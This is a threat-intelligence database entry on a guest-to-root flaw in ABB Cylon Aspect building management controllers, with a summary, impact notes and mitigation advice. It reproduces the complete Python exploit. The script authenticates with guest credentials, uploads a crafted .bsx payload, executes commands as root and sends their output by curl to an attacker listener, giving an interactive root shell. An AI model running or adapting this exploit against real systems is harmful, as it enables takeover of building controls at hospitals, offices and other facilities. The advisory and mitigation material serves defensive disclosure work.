ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation
ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation
AI Analysis
Technical Summary
The ABB Cylon Aspect 3.08.03 system, a building energy management and control solution used for scalable supervisory control of building automation systems, contains a critical privilege escalation vulnerability. This vulnerability affects multiple product lines including NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, and ASPECT-Studio firmware versions up to and including 3.08.03. The core issue arises from a misconfiguration in the sudo permissions combined with an authenticated remote code execution (RCE) flaw in the firmware update mechanism. An attacker with valid user credentials (such as a guest-level account) can upload a specially crafted .bsx file via the projectUpdateBSXFileProcess.php endpoint. This file is then moved to the web root directory and executed through projectUpdateBSXExecute.php. Due to improper input validation and sudo misconfiguration, the uploaded file is executed with root privileges, allowing the attacker to escalate from guest-level access to full root control over the system. The exploit leverages standard HTTP POST and GET requests to authenticate, upload the malicious payload, and trigger its execution. The provided exploit code is written in Python 3 and automates the entire attack process, including authentication, payload upload, execution, and establishing a reverse shell connection back to the attacker. The exploit has been tested on various Linux kernel versions and hardware architectures, including ARM and x86_64, and with multiple PHP versions and web servers such as lighttpd and Apache. This indicates a broad applicability across different deployment environments. The vulnerability is particularly dangerous because it requires only low-privileged credentials (guest:guest) and no user interaction beyond authentication. Once exploited, the attacker gains full system compromise, enabling unauthorized root access, arbitrary command execution, and potential persistent control over the building management system. This could lead to manipulation of building controls, energy management, and other critical infrastructure functions managed by the ABB Cylon Aspect platform. No official patches or mitigations are currently linked, and no known exploits have been observed in the wild yet, but the availability of public exploit code significantly raises the risk of exploitation.
Potential Impact
For European organizations, especially those managing critical infrastructure such as commercial buildings, hospitals, universities, and government facilities, this vulnerability poses a severe risk. Compromise of ABB Cylon Aspect systems could allow attackers to manipulate HVAC systems, lighting, energy consumption, and other building automation functions, potentially causing operational disruptions, safety hazards, and financial losses. Unauthorized root access could also facilitate lateral movement within enterprise networks, leading to broader compromise of IT and OT environments. Given the increasing integration of building management systems with corporate networks and IoT ecosystems, exploitation could undermine confidentiality, integrity, and availability of both physical and digital assets. Additionally, attackers could leverage this foothold to exfiltrate sensitive data or launch ransomware attacks targeting facility operations. The risk is amplified by the ease of exploitation with low-privileged credentials and the lack of current patches, making timely mitigation critical.
Mitigation Recommendations
1. Immediate mitigation should focus on restricting access to the affected ABB Cylon Aspect management interfaces by implementing strict network segmentation and firewall rules to limit access to trusted administrators only. 2. Enforce strong, unique credentials for all user accounts, especially guest or low-privilege accounts, and disable or remove default accounts where possible. 3. Monitor network traffic and logs for unusual activity related to the projectUpdateBSXFileProcess.php and projectUpdateBSXExecute.php endpoints, including unexpected file uploads or executions. 4. Employ application-layer firewalls or web application firewalls (WAFs) with custom rules to detect and block attempts to upload or execute unauthorized .bsx files. 5. Conduct regular audits of sudoers configurations on affected devices to ensure no misconfigurations allow privilege escalation. 6. Engage with ABB support channels to obtain firmware updates or patches addressing this vulnerability as they become available. 7. Implement intrusion detection systems (IDS) tuned to detect exploitation attempts and anomalous command executions on building management systems. 8. Consider deploying endpoint detection and response (EDR) solutions on management servers to detect and respond to suspicious activities. 9. Educate operational technology (OT) and IT staff about this vulnerability and the importance of credential hygiene and network controls. 10. If possible, isolate building management systems from general enterprise networks to reduce attack surface and lateral movement opportunities.
Affected Countries
Germany, France, United Kingdom, Italy, Netherlands, Sweden, Belgium, Spain, Poland, Switzerland
Indicators of Compromise
- exploit-code: #!/usr/bin/env python # # # Exploit Title: ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation # # # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio # Firmware: <=3.08.03 # # Summary: ASPECT is an award-winning scalable building energy management # and control solution designed to allow users seamless access to their # building data through standard building protocols including smart devices. # # Desc: The ABB BMS/BAS controller is vulnerable to code execution and sudo # misconfiguration flaws. An authenticated remote code execution vulnerability # in the firmware update mechanism allows an attacker with valid credentials to # escalate privileges and execute commands as root. The process involves uploading # a crafted .bsx file through projectUpdateBSXFileProcess.php, which is then moved # to htmlroot and executed by projectUpdateBSXExecute.php. This script leverages # sudo to run the uploaded bsx file, enabling the attacker to bypass input validation # checks and execute arbitrary code, leading to full system compromise and unauthorized # root access. # # --------------------------------------------------------------------------------- # # $ ./bsxroot.py 192.168.73.31 192.168.73.9 --creds guest:guest # [o] Exploit starting at 21.05.2025 12:33:47 # [o] Using credentials: guest:***** # [o] Auth successfull. # [o] PHPSESSID: g02p9tnog4d2r1z4eha1e9e688 # [o] Listening on 192.168.73.9:5555... # [o] Building name: ["Tower 3"] # [o] runtime.ver=v3.08.03 # [+] -> [virtual] rootshell # # # id # uid=0(root) gid=0(root) groups=0(root) # # pwd # /home/MIX_CMIX/htmlroot # exit # [o] Removing callback file. # [!] Connection terminated. # # --------------------------------------------------------------------------------- # # # Tested on: GNU/Linux 3.15.10 (armv7l) # GNU/Linux 3.10.0 (x86_64) # GNU/Linux 2.6.32 (x86_64) # Intel(R) Atom(TM) Processor E3930 @ 1.30GHz # Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz # PHP/7.3.11 # PHP/5.6.30 # PHP/5.4.16 # PHP/4.4.8 # PHP/5.3.3 # AspectFT Automation Application Server # lighttpd/1.4.32 # lighttpd/1.4.18 # Apache/2.2.15 (CentOS) # OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) # OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2025-5947 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5947.php # # # 21.04.2024 # # from colorama import init, Fore from urllib.parse import quote from time import sleep import threading import datetime import requests import socket import re import os import sys init() def safe(*trigger, ): return True def auth(target_ip, user, pwd): login_ep = f"http://{target_ip}/validate/login.php" payload = { 'f_user' : user, # 'aamuser, guest' 'f_pass' : pwd, # 'default, guest' 'submit' : 'Login' } sess = requests.Session() r = sess.post(login_ep, data=payload) if r.status_code == 200 and 'PHPSESSID' in sess.cookies: print("[o] Auth successfull.") phpsessid = sess.cookies.get('PHPSESSID') print("[o] PHPSESSID:", phpsessid) return sess.cookies else: print("[!] Auth failed.") return None def kacuj(target_ip, listen_ip, cmd, token=None, cookies=None): agentwho = "NetRanger/84.19" payload = f"curl -A \"`{cmd}`\" {listen_ip}:5555" url = f"http://{target_ip}/projectUpdateBSXFileProcess.php" headers = { "Content-Type": "multipart/form-data; boundary=----zeroscience", "User-Agent": agentwho } data = ( "------zeroscience\r\n" f"Content-Disposition: form-data; name=\"userfile\"; filename={AAM}\r\n" "Content-Type: application/octet-stream\r\n\r\n" f"{payload}\r\n" '------zeroscience--\r\n' ) try: r = requests.post(url, headers=headers, data=data, cookies=cookies) if r.status_code == 200: url_execute = f"http://{target_ip}/projectUpdateBSXExecute.php?file={AAM}" r = requests.get(url_execute, cookies=cookies) return r.content except requests.exceptions.RequestException as e: print(f"[!] Error sending payload: {e}") return None def koj_slusha(listen_ip): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind(("0.0.0.0", 5555)) s.listen(1) print(f"[o] Listening on {listen_ip}:5555...") while True: conn, addr = s.accept() try: data = conn.recv(9999) if not data: print("[!] Connection closed by remote host.") break dd = data.decode("utf-8", errors="ignore") uam = re.search(r"User-Agent:\s*(.*)\s*Host:", dd, re.DOTALL) if uam: print(uam.group(1), end="") else: print #print(f"[o] Full response:\n{dd}") except Exception as e: print(f"[!] Error while receiving data: {e}") finally: conn.close() def main(): if safe(True): print("\nSafety: \033[92mON\033[0m") exit(-17) else: next global AAM global start AAM = "firmware.bsx" start = datetime.datetime.now() start = start.strftime("%d.%m.%Y %H:%M:%S") title = "\033[96mABB Cylon® ASPECT® Supervisory Building Control v3.08.03\033[0m" subtl = "\033[95m\t\t-> Remote Root Exploit <-\033[0m" prj = f""" P R O J E C T\033[90m .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ \033[0m {title} {subtl} """ if len(sys.argv) < 4: print(prj) print("./bsxroot.py <targetIP> <listenIP> <PHPSESSID / --creds user:pass>") sys.exit(-0) target_ip = sys.argv[1] listen_ip = sys.argv[2] auth_arg = sys.argv[3] print("[o] Exploit starting at", start) if "--creds" in sys.argv: creds_index = sys.argv.index("--creds") + 1 if creds_index >= len(sys.argv): print("[!] Error: Missing credentials after --creds.") sys.exit(-1) user_pass = sys.argv[creds_index] if ":" not in user_pass: print("[!] Error: Invalid credentials format. Expected format: user:pass.") sys.exit(-2) user, pwd = user_pass.split(":") print(f"[o] Using credentials: {user}:{'*' * len(pwd)}") cookies = auth(target_ip, user, pwd) else: token = auth_arg cookies = {"PHPSESSID": token} if not cookies: sys.exit(-3) nishka = threading.Thread(target=koj_slusha, args=(listen_ip,)) nishka.daemon = True nishka.start() bacname = f"http://{target_ip}/getApplicationNamesJS.php" r = requests.get(bacname) if r.status_code == 200: try: r = r.content decor = r.decode("utf-8") except UnicodeDecodeError: decor = r.decode("utf-8", errors="ignore") odg = re.search(r"var instanceDirectory=(.*?);", decor) if odg: cmd = "echo -ne \"[o] \" ; cat runtime/release.properties | grep -w 'runtime.ver'" print("[o] Building name:", odg.group(1)) kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies) print("\033[92m[+] -> [virtual] rootshell\033[0m\n") else: print("[o] Unknown building name.") sleep(0.01) while True: sleep(0.01) cmd = input("# ") if cmd.lower() in ["exit", "quit"]: print("[o] Removing callback file.") kacuj(target_ip, listen_ip, "rm /tmp/" + AAM, token=None, cookies=cookies) print("\033[91m[!] Connection terminated.\033[0m") os._exit(-17) kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies) nishka.join() if __name__ == "__main__": main()
ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation
Description
ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation
AI-Powered Analysis
Technical Analysis
The ABB Cylon Aspect 3.08.03 system, a building energy management and control solution used for scalable supervisory control of building automation systems, contains a critical privilege escalation vulnerability. This vulnerability affects multiple product lines including NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, and ASPECT-Studio firmware versions up to and including 3.08.03. The core issue arises from a misconfiguration in the sudo permissions combined with an authenticated remote code execution (RCE) flaw in the firmware update mechanism. An attacker with valid user credentials (such as a guest-level account) can upload a specially crafted .bsx file via the projectUpdateBSXFileProcess.php endpoint. This file is then moved to the web root directory and executed through projectUpdateBSXExecute.php. Due to improper input validation and sudo misconfiguration, the uploaded file is executed with root privileges, allowing the attacker to escalate from guest-level access to full root control over the system. The exploit leverages standard HTTP POST and GET requests to authenticate, upload the malicious payload, and trigger its execution. The provided exploit code is written in Python 3 and automates the entire attack process, including authentication, payload upload, execution, and establishing a reverse shell connection back to the attacker. The exploit has been tested on various Linux kernel versions and hardware architectures, including ARM and x86_64, and with multiple PHP versions and web servers such as lighttpd and Apache. This indicates a broad applicability across different deployment environments. The vulnerability is particularly dangerous because it requires only low-privileged credentials (guest:guest) and no user interaction beyond authentication. Once exploited, the attacker gains full system compromise, enabling unauthorized root access, arbitrary command execution, and potential persistent control over the building management system. This could lead to manipulation of building controls, energy management, and other critical infrastructure functions managed by the ABB Cylon Aspect platform. No official patches or mitigations are currently linked, and no known exploits have been observed in the wild yet, but the availability of public exploit code significantly raises the risk of exploitation.
Potential Impact
For European organizations, especially those managing critical infrastructure such as commercial buildings, hospitals, universities, and government facilities, this vulnerability poses a severe risk. Compromise of ABB Cylon Aspect systems could allow attackers to manipulate HVAC systems, lighting, energy consumption, and other building automation functions, potentially causing operational disruptions, safety hazards, and financial losses. Unauthorized root access could also facilitate lateral movement within enterprise networks, leading to broader compromise of IT and OT environments. Given the increasing integration of building management systems with corporate networks and IoT ecosystems, exploitation could undermine confidentiality, integrity, and availability of both physical and digital assets. Additionally, attackers could leverage this foothold to exfiltrate sensitive data or launch ransomware attacks targeting facility operations. The risk is amplified by the ease of exploitation with low-privileged credentials and the lack of current patches, making timely mitigation critical.
Mitigation Recommendations
1. Immediate mitigation should focus on restricting access to the affected ABB Cylon Aspect management interfaces by implementing strict network segmentation and firewall rules to limit access to trusted administrators only. 2. Enforce strong, unique credentials for all user accounts, especially guest or low-privilege accounts, and disable or remove default accounts where possible. 3. Monitor network traffic and logs for unusual activity related to the projectUpdateBSXFileProcess.php and projectUpdateBSXExecute.php endpoints, including unexpected file uploads or executions. 4. Employ application-layer firewalls or web application firewalls (WAFs) with custom rules to detect and block attempts to upload or execute unauthorized .bsx files. 5. Conduct regular audits of sudoers configurations on affected devices to ensure no misconfigurations allow privilege escalation. 6. Engage with ABB support channels to obtain firmware updates or patches addressing this vulnerability as they become available. 7. Implement intrusion detection systems (IDS) tuned to detect exploitation attempts and anomalous command executions on building management systems. 8. Consider deploying endpoint detection and response (EDR) solutions on management servers to detect and respond to suspicious activities. 9. Educate operational technology (OT) and IT staff about this vulnerability and the importance of credential hygiene and network controls. 10. If possible, isolate building management systems from general enterprise networks to reduce attack surface and lateral movement opportunities.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52305
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation
#!/usr/bin/env python # # # Exploit Title: ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation # # # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio # Firmware: <=3.08.03 # # Summary: ASPECT is an award-winning scalable building energy management # and control solution designed to allow users seamless access to their # building data through standard building protocols includin... (8832 more characters)
Threat ID: 68489d9d7e6d765d51d52cc5
Added to database: 6/10/2025, 9:03:25 PM
Last enriched: 6/11/2025, 9:15:30 PM
Last updated: 7/31/2025, 3:21:56 PM
Views: 18
Related Threats
Researcher to release exploit for full auth bypass on FortiWeb
HighTop Israeli Cybersecurity Director Arrested in US Child Exploitation Sting
HighEncryptHub abuses Brave Support in new campaign exploiting MSC EvilTwin flaw
MediumU.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumU.S. CISA adds Microsoft Internet Explorer, Microsoft Office Excel, and WinRAR flaws to its Known Exploited Vulnerabilities catalog
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.